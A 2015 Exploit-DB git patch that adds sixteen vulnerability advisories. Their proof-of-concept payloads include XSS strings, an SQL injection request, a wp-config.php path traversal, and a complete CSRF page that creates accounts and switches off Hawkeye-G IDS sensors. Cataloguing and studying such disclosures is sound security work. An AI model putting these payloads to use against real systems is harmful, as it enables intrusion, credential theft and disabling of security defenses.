From c22dc8c9d46d54a202e6d8379833c3b881b82371 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 25 Jul 2015 05:02:16 +0000
Subject: [PATCH] DB: 2015-07-25

16 new exploits
---
 files.csv                            |  18 +-
 platforms/asp/webapps/37678.txt      |  13 ++
 platforms/asp/webapps/37689.txt      |  27 +++
 platforms/multiple/webapps/37662.txt | 173 ++++++++++++++++++
 platforms/multiple/webapps/37686.txt | 250 +++++++++++++++++++++++++++
 platforms/php/remote/37688.txt       |  14 ++
 platforms/php/webapps/37622.txt      |  32 ++++
 platforms/php/webapps/37659.txt      |  30 ++++
 platforms/php/webapps/37679.txt      |  13 ++
 platforms/php/webapps/37680.txt      |   9 +
 platforms/php/webapps/37681.txt      |   9 +
 platforms/php/webapps/37682.txt      |   7 +
 platforms/php/webapps/37683.txt      |   9 +
 platforms/php/webapps/37684.html     |   7 +
 platforms/php/webapps/37687.txt      |   9 +
 platforms/php/webapps/37690.txt      |   7 +
 platforms/xml/webapps/37685.txt      |  14 ++
 17 files changed, 640 insertions(+), 1 deletion(-)
 create mode 100755 platforms/asp/webapps/37678.txt
 create mode 100755 platforms/asp/webapps/37689.txt
 create mode 100755 platforms/multiple/webapps/37662.txt
 create mode 100755 platforms/multiple/webapps/37686.txt
 create mode 100755 platforms/php/remote/37688.txt
 create mode 100755 platforms/php/webapps/37622.txt
 create mode 100755 platforms/php/webapps/37659.txt
 create mode 100755 platforms/php/webapps/37679.txt
 create mode 100755 platforms/php/webapps/37680.txt
 create mode 100755 platforms/php/webapps/37681.txt
 create mode 100755 platforms/php/webapps/37682.txt
 create mode 100755 platforms/php/webapps/37683.txt
 create mode 100755 platforms/php/webapps/37684.html
 create mode 100755 platforms/php/webapps/37687.txt
 create mode 100755 platforms/php/webapps/37690.txt
 create mode 100755 platforms/xml/webapps/37685.txt

diff --git a/files.csv b/files.csv
index 68d36dbc7..b4a72db27 100755
--- a/files.csv
+++ b/files.csv
@@ -10665,7 +10665,7 @@ id,file,description,date,author,platform,type,port
 11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0
 11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0
 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
-11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
+11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
 11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL Injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0
@@ -33945,6 +33945,7 @@ id,file,description,date,author,platform,type,port
 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
 37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
 37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
+37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
 37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0
@@ -33992,7 +33993,10 @@ id,file,description,date,author,platform,type,port
 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0
 37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Include Vulnerability",2012-08-23,"Corrado Liotta",php,webapps,0
 37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution Vulnerability",2015-07-20,"Eduardo Braun Prado",windows,local,0
+37688,platforms/php/remote/37688.txt,"PHP 'header()' HTTP Header Injection Vulnerability",2011-10-06,"Mr. Tokumaru",php,remote,0
+37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0
 37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash Proof Of Concept",2015-07-20,"Reza Espargham",ios,dos,0
+37662,platforms/multiple/webapps/37662.txt,"Airdroid iOS_ Android & Win 3.1.3 - Persistent Vulnerability",2015-07-20,Vulnerability-Lab,multiple,webapps,0
 37663,platforms/linux/dos/37663.txt,"TcpDump rpki_rtr_pdu_print Out-of-Bounds Denial of Service",2015-07-20,"Luke Arntson",linux,dos,0
 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
@@ -34006,3 +34010,15 @@ id,file,description,date,author,platform,type,port
 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection Vulnerability",2012-08-27,Crim3R,php,webapps,0
 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
 37677,platforms/php/webapps/37677.txt,"Wordpress Finder 'order' Parameter Cross Site Scripting Vulnerability",2012-08-25,Crim3R,php,webapps,0
+37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0
+37679,platforms/php/webapps/37679.txt,"LibGuides Multiple Cross Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0
+37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host 'users.php' Cross Site Scripting Vulnerability",2012-08-25,Explo!ter,php,webapps,0
+37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure Vulnerability",2012-08-28,"Jan Van Niekerk",php,webapps,0
+37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload Vulnerability",2012-08-28,"Iranian Dark Coders",php,webapps,0
+37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
+37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
+37685,platforms/xml/webapps/37685.txt,"squidGuard 1.4 Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,webapps,0
+37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0
+37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
+37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
+37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
diff --git a/platforms/asp/webapps/37678.txt b/platforms/asp/webapps/37678.txt
new file mode 100755
index 000000000..2d5fb7515
--- /dev/null
+++ b/platforms/asp/webapps/37678.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/55220/info
+
+Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Web Wiz Forums 10.03 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.www.example.com/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676 
\ No newline at end of file
diff --git a/platforms/asp/webapps/37689.txt b/platforms/asp/webapps/37689.txt
new file mode 100755
index 000000000..8b1e17b6b
--- /dev/null
+++ b/platforms/asp/webapps/37689.txt
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/55299/info
+
+XM Forum is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+P0C : 
+HTTP HEADERS : 
+Host: www.example.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer: http://www.example.com/chilli_forum/search.asp
+Cookie: TrackID=%7B54A35316%2D7519%2D405D%2D950A%2DA8CF50497150%7D; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 46
+Post Data --------------------
+terms=%27&stype=1&in=1&forum=-1&ndays=0&mname=
+
+Http response : 
+
+28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f
+
+84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f 
+
diff --git a/platforms/multiple/webapps/37662.txt b/platforms/multiple/webapps/37662.txt
new file mode 100755
index 000000000..9366aa187
--- /dev/null
+++ b/platforms/multiple/webapps/37662.txt
@@ -0,0 +1,173 @@
+Document Title:
+===============
+Airdroid iOS, Android & Win 3.1.3 - Persistent Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1543
+
+
+Release Date:
+=============
+2015-07-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1543
+
+
+Common Vulnerability Scoring System:
+====================================
+3.9
+
+
+Product & Service Introduction:
+===============================
+AirDroid allows you to access wirelessly and for free on your Android phone or tablet from Windows, Mac or the Internet, and to control it.
+
+(Copy of the Product Homepage: https://www.airdroid.com/de/ )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official SandStudio AirDroid (windows, ios and android) mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-07-05: Researcher Notification & Coordination (Hadji Samir)
+2015-07-06: Vendor Notification (Security Team)
+2015-07-20: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Sand Studio
+Product: AirDroid iOS Application (Andoird, Windows, MacOS & Web) 3.1.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered  in the official SandStudio AirDroid (windows, ios and android) mobile web-application.
+The vulnerability allows remote attacker or low privilege user accounts to inject malicious codes to the application-side of the affected mobile web-application.
+
+The vulnerability is located in the send messages and the send message with an attached file  module. Remote attackers with low privilege user account are able to upload file name 
+with malicious strings like ``><script>alert(1).txt. On the arrival inbox occurs the execution of the malicious code that compromises the other target system/device user account.
+The vulnerability is located on the application-side and the request method to inject is POST.
+
+The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.
+Exploitation of the application-side web vulnerability requires a low privilege web-application user account and low user interaction.
+Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious 
+sources and application-side manipulation of affected or connected module context.
+
+Request Method(s):
+						[+] POST
+
+Vulnerable Module(s):
+						[+] Send Message
+
+Vulnerable Parameter(s):
+						[+] filename
+
+Affected Module(s):
+						[+] Message Inbox
+
+
+Proof of Concept (PoC):
+=======================
+The vulnerability can be exploited by remote attackers with low privilege application user account and low user interaction (click).
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC:
+<span class="name">"><"><script>alert(document.cookie).txt< span="">[PERSISTENT INJECTED SCRIPT CODE]
+    <span class="progress-rate">100%</span>
+    <a class="attach-del-icon"></a>
+</scrip...txt<></span>
+
+
+--- PoC Session Logs [POST] ---
+11:13:00.993[0ms][total 0ms] Status: pending[]
+POST https://upload.airdroid.com/sms/attachment/?fn=%22%3E%3Cscript%3Ealert(document.cookie).txt&d=&after=0&rtype=0&origin=http%3A%2F%2Fweb.airdroid.com&country=DZ&fname=%22%3E%3Cscript%3Ealert(document.cookie).txt 
+Load Flags[LOAD_BYPASS_CACHE  ] Content Size[unknown] Mime Type[unknown]
+   Request Headers:
+      Host[upload.airdroid.com]
+      User-Agent[Mozilla/5.0 (X11; Linux i686; rv:39.0) Gecko/20100101 Firefox/39.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[en-US,en;q=0.5]
+      Accept-Encoding[gzip, deflate]
+      Content-Type[application/octet-stream]
+      Referer[http://web.airdroid.com/]
+      Content-Length[5281]
+      Origin[http://web.airdroid.com]
+      Cookie[_SESSION=0b484eb230f27c004a7e990bace6175a416b58ed-%00_TS%3A1438769709%00; _ga=GA1.2.1046706455.1436177514; _gat=1; account_sid=c51d21b583ce76c04c8d4fa5a5c7496e; account_info=aW5mby5kaW1hbmV0QGdtYWlsLmNvbQ%3D%3D%2C63b971b729a756a3c1eb0fec6cccb736%2C9731220%2C59fd7af875fa5434a86e5397c79380d2]
+   Post Data:
+      POST_DATA[-PNG
+	  
+Note: We demonstrated the poc by usage of the web-app but the local app is also vulnerable to the same issue!
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerbaility can be patched by a secure parse and encode of the vulnerable filename value in the send message module with the attach file function.
+
+
+Security Risk:
+==============
+The security risk of the application-side input validation web vulnerability in the airdroid app is estimated as medium. (CVSS 3.9)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
diff --git a/platforms/multiple/webapps/37686.txt b/platforms/multiple/webapps/37686.txt
new file mode 100755
index 000000000..d754336d5
--- /dev/null
+++ b/platforms/multiple/webapps/37686.txt
@@ -0,0 +1,250 @@
+# Exploit Title:  CSRF, Network Threat Appliance IDS / IPS
+# Google Dork: intitle: CSRF Network Threat Appliance IDS / IPS
+# Date: 2015-07-24
+# Exploit Author:  John Page ( hyp3rlinx )
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: www.hexiscyber.com
+# Software Link:  www.hexiscyber.com/products/hawkeye-g
+# Version:  v3.0.1.4912
+# Tested on: windows 7 SP1
+# Category: Network Threat Appliance IDS / IPS
+
+
+
+Vulnerability Type:
+===================
+CSRF
+
+
+CVE Reference:
+==============
+CVE-2015-2878
+
+
+
+Vendor:
+===================
+www.hexiscyber.com
+
+
+
+Product:
+=====================================================================
+Hawkeye-G v3.0.1.4912
+
+Hawkeye G is an active defense disruptive technology that detects,
+investigates, remediates and removes cyber threats within the network.
+
+
+
+Advisory Information:
+====================================================
+
+Multiple CSRF(s) Vulnerabilities:
+
+
+Vulnerability Details:
+=====================
+
+1- CSRF Add arbitrary accounts to system
+------------------------------------
+
+vulnerable URL:
+https://localhost:8443/interface/rest/accounts/json
+
+vulnerable POST parameter:
+'name'
+
+
+2- CSRF modification of network sensor settings
+---------------------------------------------------------------------
+
+a) Turn off 'Url matching' Sensor
+b) Turn off 'DNS Inject' Sensor
+c) Turn off 'IP Redirect' Sensor
+
+vulnerable URL:
+https://localhost:8443/interface/rest/dpi/setEnabled/1
+
+vulnerable POST parameters:
+'url_match'
+'dns_inject'
+'ip_redirect'
+
+3- CSRF whitelisting of malware MD5 hash IDs
+------------------------------------------------------
+
+vulnerable URL:
+https://localhost:8443/interface/rest/md5-threats/whitelist
+
+vulnerable POST parameter 'id'
+
+
+
+CSRF Exploit code(s):
+====================
+
+
+<!DOCTYPE>
+<html>
+
+<script>
+
+/* Execute consecutive CSRF exploits */
+
+function ghostofsin(){
+ var doc=document;
+ var e1=doc.getElementById('exploit_1')
+ e1.submit()
+ var e2=doc.getElementById('exploit_2')
+  e2.submit()
+ var e3=doc.getElementById('exploit_3')
+  e3.submit()
+ var e4=doc.getElementById('exploit_4')
+  e4.submit()
+}
+</script>
+
+<body onLoad="ghostofsin()">
+
+<!-- Add arbitrary accounts -->
+<form id="exploit_1" action="
+https://localhost:8443/interface/rest/accounts/json" method="post">
+<input type="text" name="human" value="true" />
+<input type="text" name="name" value="inverted_crosses" />
+<input type="text" name="domainId" value=""/>
+<input type="text" name="domain_id" value="" />
+<input type="text" name="roving" value="false" />
+</form>
+
+
+<!-- shutdown the 'Url Matching' Sensor that
+is responsible for detecting known malware domains -->
+
+<form id="exploit_2" action="
+https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">
+<input type="text" name="level" value="1" />
+<input type="text" name="enable" value="false" />
+<input type="text" name="attribute" value="url_match"/>
+</form>
+
+<!-- set the DNS Inject Network Sensor to off -->
+
+<form id="exploit_3" action="
+https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">
+<input type="text" name="level" value="1" />
+<input type="text" name="enable" value="false" />
+<input type="text" name="attribute" value="dns_inject"/>
+</form>
+
+<!-- set the IP Redirect Network Sensor to off -->
+
+<form id="exploit_4" action="
+https://localhost:8443/interface/rest/dpi/setEnabled/1" method="post">
+<input type="text" name="level" value="1" />
+<input type="text" name="enable" value="false" />
+<input type="text" name="attribute" value="ip_redirect"/>
+</form>
+
+</body>
+</html>
+
+
+Whitelist MD5 malware IDs CSRF:
+-------------------------------
+
+In final CSRF POC to try an white list malware MD5 IDs will be a bit more
+complex,
+we need to submit form many times hidden in background using iframe so we
+stay on same page.
+Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a
+loop an create some
+numbers 8 bytes long and dynamically assign the 'id' value of the field and
+execute multiple
+POST requests in background, it will be hit or miss unless you know ahead
+of time the MD5 ID
+in the database your targeting.
+
+e.g. Malware MD5 database ID 28240001
+
+So Here we go!...
+
+<!-- whitelist MD5 malware IDs -->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
+"http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<title>CSRF POC hyp3rlinx</title>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
+</head>
+<body>
+<form id="hell" action="
+https://localhost:8443/interface/rest/md5-threats/whitelist"
+target="demonica" method="post">
+<input type="hidden" name="id" id="id"><br>
+</form>
+<IFRAME style="display:none" name="demonica"></IFRAME>
+<script>
+var doc=document
+var x=1000
+exorcism()
+function exorcism(){
+ x++
+ String(x)
+ x+="0001"
+ var f=doc.getElementById('hell')
+ var e=doc.getElementById('id')
+ e.value=x
+  x=x.substr(0,4)
+ f.submit()
+ }
+ setInterval("exorcism()",100)
+</script>
+</body>
+</html>
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification: June 30, 2015
+July 24, 2015 : Public Disclosure
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+Request Method(s):              [+] POST
+
+
+Vulnerable Product:             [+] Hawkeye-G v3.0.1.4912
+
+
+Vulnerable Parameter(s):        [+] name, enable, id
+
+
+Affected Area(s):               [+] Network Threat Appliance, Local Domain
+
+
+============================================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+
+(hyp3rlinx)
diff --git a/platforms/php/remote/37688.txt b/platforms/php/remote/37688.txt
new file mode 100755
index 000000000..0c77c15cd
--- /dev/null
+++ b/platforms/php/remote/37688.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/55297/info
+
+PHP is prone to a vulnerability that allows attackers to inject arbitrary headers through a URL.
+
+By inserting arbitrary headers, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTML-injection, and other attacks.
+
+PHP 5.1.2 is vulnerable; other versions may also be affected. 
+
+<?php
+header('Location: '.$_GET['url']);
+print_r($_COOKIE);
+?>
+
+http://www.example.com/head1.php?url=http://example.com/head1.php%0DSet-Cookie:+NAME=foo 
\ No newline at end of file
diff --git a/platforms/php/webapps/37622.txt b/platforms/php/webapps/37622.txt
new file mode 100755
index 000000000..9256b36bd
--- /dev/null
+++ b/platforms/php/webapps/37622.txt
@@ -0,0 +1,32 @@
+# WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS
+
+# Vendor Homepage: http://www.wpdownloadmanager.com
+# Software Link: https://wordpress.org/plugins/download-manager
+# Affected Versions: Free 2.7.94 & Pro 4
+# Tested on: WordPress 4.2.2
+
+# Discovered by Filippos Mastrogiannis
+# Twitter: @filipposmastro
+# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177
+
+-- Description --
+
+This stored XSS vulnerability allows any authenticated wordpress user
+to inject malicious code via the name of the uploaded file:
+e.g. <svg onload=3D3Dalert(0)>.jpg
+
+The vulnerability exists because the file name is not properly sanitized
+and this can lead to malicious code injection that will be executed on the
+target=3DE2=3D80=3D99s browser
+
+-- Proof of Concept --
+
+1. The attacker creates a new download package via the plugin's menu
+and uploads a file with the name: <svg onload=3D3Dalert(0)>.jpg
+
+2. The stored XSS can be triggered when an authenticated user (e.g. admin)
+attempts to edit this download package
+
+-- Solution --
+
+Upgrade to the latest version
\ No newline at end of file
diff --git a/platforms/php/webapps/37659.txt b/platforms/php/webapps/37659.txt
new file mode 100755
index 000000000..52758e4b9
--- /dev/null
+++ b/platforms/php/webapps/37659.txt
@@ -0,0 +1,30 @@
+# phpVibe < 4.20 Stored XSS
+
+# Vendor Homepage: http://www.phpvibe.com
+# Affected Versions: prior to 4.20
+
+# Discovered by Filippos Mastrogiannis
+# Twitter: @filipposmastro
+# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177
+
+-- Description --
+
+This stored XSS vulnerability allows any logged in user
+to inject malicious code in the comments section:
+e.g. "><body onLoad=confirm("XSS")>
+
+The vulnerability exists because the user input is not properly sanitized
+and this can lead to malicious code injection that will be executed on the
+target’s browser
+
+-- Proof of Concept --
+
+1. The attacker posts a new comment which contains our payload:
+"><body onLoad=confirm("XSS")>
+
+2. The stored XSS can be triggered when any user visits the link of the
+uploaded content
+
+-- Solution --
+
+The vendor has fixed the issue in the version 4.21
diff --git a/platforms/php/webapps/37679.txt b/platforms/php/webapps/37679.txt
new file mode 100755
index 000000000..609d60ddc
--- /dev/null
+++ b/platforms/php/webapps/37679.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/55222/info
+
+LibGuides is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.example.com/cat.php?cid=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
+
+http://www.example.com/mobile.php?action=8&gid=&iid=145&search=%22%3E%3Cscript%3Ealert(0);%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/37680.txt b/platforms/php/webapps/37680.txt
new file mode 100755
index 000000000..13b372a56
--- /dev/null
+++ b/platforms/php/webapps/37680.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55237/info
+
+Mihalism Multi Host is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Mihalism Multi Host 5.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/users.php?act=register&return=/><sCrIpT>alert('Explo!ter')</sCrIpT> 
\ No newline at end of file
diff --git a/platforms/php/webapps/37681.txt b/platforms/php/webapps/37681.txt
new file mode 100755
index 000000000..facd8174a
--- /dev/null
+++ b/platforms/php/webapps/37681.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55241/info
+
+The Cloudsafe365 plugin for WordPress is prone to a file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view local files in the context of the web server process. This may aid in further attacks. 
+
+http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
+
+http://www.example.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/37682.txt b/platforms/php/webapps/37682.txt
new file mode 100755
index 000000000..ec7074b3b
--- /dev/null
+++ b/platforms/php/webapps/37682.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/55243/info
+
+The Simple:Press Forum plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+http://www.example.com/wp/wp-content/plugins/simple-forum/forum/uploader/sf-uploader.php?id=4&folder=uploads/forum/petas 
\ No newline at end of file
diff --git a/platforms/php/webapps/37683.txt b/platforms/php/webapps/37683.txt
new file mode 100755
index 000000000..35886b634
--- /dev/null
+++ b/platforms/php/webapps/37683.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/55275/info
+
+Phorum is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Phorum 5.2.18 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/control.php?0,panel=groupmod,group=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
\ No newline at end of file
